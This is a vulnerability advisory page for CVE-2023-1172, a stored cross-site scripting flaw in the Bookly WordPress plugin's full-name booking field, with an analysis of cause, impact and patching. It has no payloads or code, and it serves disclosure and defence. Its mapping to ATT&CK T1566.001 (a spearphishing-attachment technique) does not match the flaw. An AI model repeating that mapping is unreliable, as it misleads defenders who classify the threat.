CVE-2023-1172 in Bookly Plugin
Summary
by MITRE • 03/17/2023
The Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the full name value in versions up to, and including, 21.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 04/11/2023
The Bookly plugin for WordPress represents a widely used booking system that allows website administrators to manage appointments and reservations through their WordPress sites. This vulnerability affects versions up to and including 21.5, making it a significant concern for thousands of WordPress installations that rely on this plugin for their appointment booking functionality. The stored cross-site scripting flaw specifically targets the full name input field, which is commonly used during the booking process to collect customer information. The vulnerability exists because the plugin fails to properly sanitize user input before storing it in the database and subsequently rendering it on web pages without adequate output escaping mechanisms.
The technical flaw stems from inadequate input validation and output sanitization practices within the plugin's codebase. When users enter their full names during the booking process, the plugin stores this data without sufficient sanitization measures that would prevent malicious script injection. The vulnerability manifests as a stored XSS attack because the malicious scripts are permanently saved in the database rather than being reflected in a single request. This means that any user who accesses a page containing the injected script will execute the malicious code in their browser context, potentially leading to session hijacking, credential theft, or redirection to malicious sites. The attack vector requires no authentication from the attacker, making it particularly dangerous as anyone can exploit this vulnerability simply by submitting malicious input through the booking form.
The operational impact of this vulnerability extends beyond simple script execution, as it can enable attackers to compromise the entire WordPress installation or target specific users within the site's administrative interface. When unauthenticated attackers inject malicious scripts through the full name field, they can potentially steal cookies, modify content, or redirect users to phishing sites. The stored nature of the vulnerability means that the malicious code persists even after the initial injection, continuously affecting any user who views pages containing the compromised data. This creates a persistent threat that can remain undetected for extended periods, allowing attackers to harvest credentials, monitor user activities, or establish backdoors within the WordPress environment. The vulnerability particularly affects sites that use Bookly for customer-facing booking systems where guest users can submit information through the plugin's forms.
Mitigation strategies for this vulnerability should prioritize immediate patching of the Bookly plugin to version 21.6 or later, which contains the necessary security fixes. Administrators should also implement additional defensive measures such as input validation at multiple layers, including client-side and server-side sanitization, and ensure that all user-supplied data undergoes proper escaping before being rendered on web pages. Network-level protections such as web application firewalls can help detect and block suspicious input patterns, while regular security audits should monitor for similar vulnerabilities in other plugins and themes. The vulnerability aligns with CWE-79 which describes cross-site scripting flaws, and maps to ATT&CK technique T1566.001 for initial access through malicious web content, making it a critical target for both preventive and detective security controls within WordPress environments.